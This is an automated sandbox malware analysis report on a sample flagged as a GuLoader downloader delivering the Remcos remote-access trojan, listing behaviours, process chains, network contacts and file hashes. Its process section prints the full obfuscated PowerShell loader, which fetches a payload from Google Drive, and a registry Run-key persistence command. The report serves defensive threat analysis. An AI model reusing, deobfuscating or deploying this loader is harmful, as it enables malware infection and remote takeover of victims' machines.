Malware Analysis Report

2025-01-02 03:20

Sample ID 240402-mll5fafa7x
Target 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.zip
SHA256 ee511bd7f93bedcef2c18179b04b312ed417c9674a19154ea6463b705706d157
Tags
guloader remcos remotehost downloader persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ee511bd7f93bedcef2c18179b04b312ed417c9674a19154ea6463b705706d157

Threat Level: Known bad

The file 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.zip was found to be: Known bad.

Malicious Activity Summary

guloader remcos remotehost downloader persistence rat

Remcos

Guloader, Cloudeye

Blocklisted process makes network request

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-02 10:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-02 10:33

Reported

2024-04-02 10:35

Platform

win7-20240221-en

Max time kernel

119s

Max time network

128s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

Signatures

Guloader, Cloudeye

downloader guloader

Remcos

rat remcos

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Biotron = "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\\kostbare\\').Storbyer;%Habilitcar% ($Assaults)" | C:\Windows\SysWOW64\reg.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1092 set thread context of 2356 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 820 wrote to memory of 856 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 856 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 856 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 856 wrote to memory of 1692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 856 wrote to memory of 1692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 856 wrote to memory of 1692 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 856 wrote to memory of 1092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 856 wrote to memory of 1092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 856 wrote to memory of 1092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 856 wrote to memory of 1092 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 984 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1092 wrote to memory of 984 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1092 wrote to memory of 984 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1092 wrote to memory of 984 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1092 wrote to memory of 2356 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2356 wrote to memory of 2380 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 2356 wrote to memory of 2380 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 2356 wrote to memory of 2380 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 2356 wrote to memory of 2380 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2380 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2380 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2380 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder 
Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble 
M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. 
Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder 
Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble 
M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. 
Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | drive.google.com | udp
GB | 142.250.187.206:443 | drive.google.com | tcp
US | 8.8.8.8:53 | drive.usercontent.google.com | udp
GB | 142.250.178.1:443 | drive.usercontent.google.com | tcp
GB | 142.250.187.206:443 | drive.google.com | tcp
GB | 142.250.178.1:443 | drive.usercontent.google.com | tcp

Files

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 5a338c8e32847195d515ae84df1062b2
SHA1 2f5f69850afc21b0a2f04b62cacb255bb25f9060
SHA256 180384737910e6813278a5d1f52ece86808f0376ad0a57f7f37cead2f9d4e24c
SHA512 1cd79307419ffb60d18ac15625dc812a3659740dc72df9972c5ff86d5c5798d1093abd3a7f1888d29e10fc515b8aff9dc82bec563914b220e72b632a66502ed0

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 c82d9930dd17d6684240dd977c2af758
SHA1 16e4c5203e5ac71702bfddcc61f22343e92e0f01
SHA256 4c0e12dda9384c2e09b5a7084c92a8f7f6bf0002a98492b0484ef44921166739
SHA512 e9c5d4296d2c4e860cbc1aec24916bbe7de50946ae832e2112887b7e9ac2dadffa8d31973992653566c953fcad2141e17ffcf58197c3a8029a0f6108174c99d1

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 6918227bd511957b4973e87dacc3578c
SHA1 02db58f78bdee4d0b0911bc30a332cc4e6affb3b
SHA256 a9e966efdcecba63a446cb2d965caaacc22a35e4d15fd167d2db3a4bb318f7e0
SHA512 869026b2e972c2a2c70156d101a1e0b0c1237798dc50f03bdbd1e2d1a1dae28519f8de0ca8460cbc91be649045caa92d0f1d186def40d71449a179d21bcc7787

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 59f82063d33f5e06154e5fd2188539ac
SHA1 825c4d7eb97395f3cde71aeccf1bcbaed6bce0a3
SHA256 43e0c1d10056335af43b6cc9ed52c6c02d6db81c67c8f9f4343e658c1d52f3a5
SHA512 d2b136ef38a347208f038a533e34e83ed433cc265d4929e160337599818d2603704010add76db4deb3fc6d6372112e82048be5e76b5ad018c7b930c10b7b1ad9

memory/856-261-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/856-262-0x0000000002810000-0x0000000002818000-memory.dmp

memory/856-264-0x0000000002790000-0x0000000002810000-memory.dmp

memory/856-263-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/856-265-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/856-267-0x0000000002790000-0x0000000002810000-memory.dmp

memory/856-269-0x0000000002790000-0x0000000002810000-memory.dmp

memory/856-268-0x0000000002BA0000-0x0000000002BC2000-memory.dmp

memory/856-266-0x0000000002790000-0x0000000002810000-memory.dmp

memory/856-270-0x00000000029B0000-0x00000000029C2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D5WCE7NLPY5Y1CRVOAIH.temp

MD5 0df605927242ff29192a66cfbbd72856
SHA1 a23c219d35aa9b71b6852e64fd8e4fdc4b84a903
SHA256 85c48ee3af14d811ef640416225c5131680f0211766a14994a0a67005c4aaf6b
SHA512 fe7b89e2d1b7f5935fc1eb7c5ef6657aefd054cf7e88dbf46ab4a4b668dab6f6f0b7be541e6f280ca602ba67149f92bb5df646152f90452471db6e782f5f85b4

memory/1092-273-0x0000000072F90000-0x000000007353B000-memory.dmp

memory/1092-274-0x0000000002AB0000-0x0000000002AF0000-memory.dmp

memory/1092-275-0x0000000072F90000-0x000000007353B000-memory.dmp

memory/1092-276-0x0000000002AB0000-0x0000000002AF0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2b5a00255fed46023aceb63ee1044709
SHA1 abdcfe634f5c59d42921678b89b7221d5a3e04ed
SHA256 11a9a2de26b9b5ea23fd8cc969c2772aaa5c441705e9be44ef6fd8ab9a8b85b4
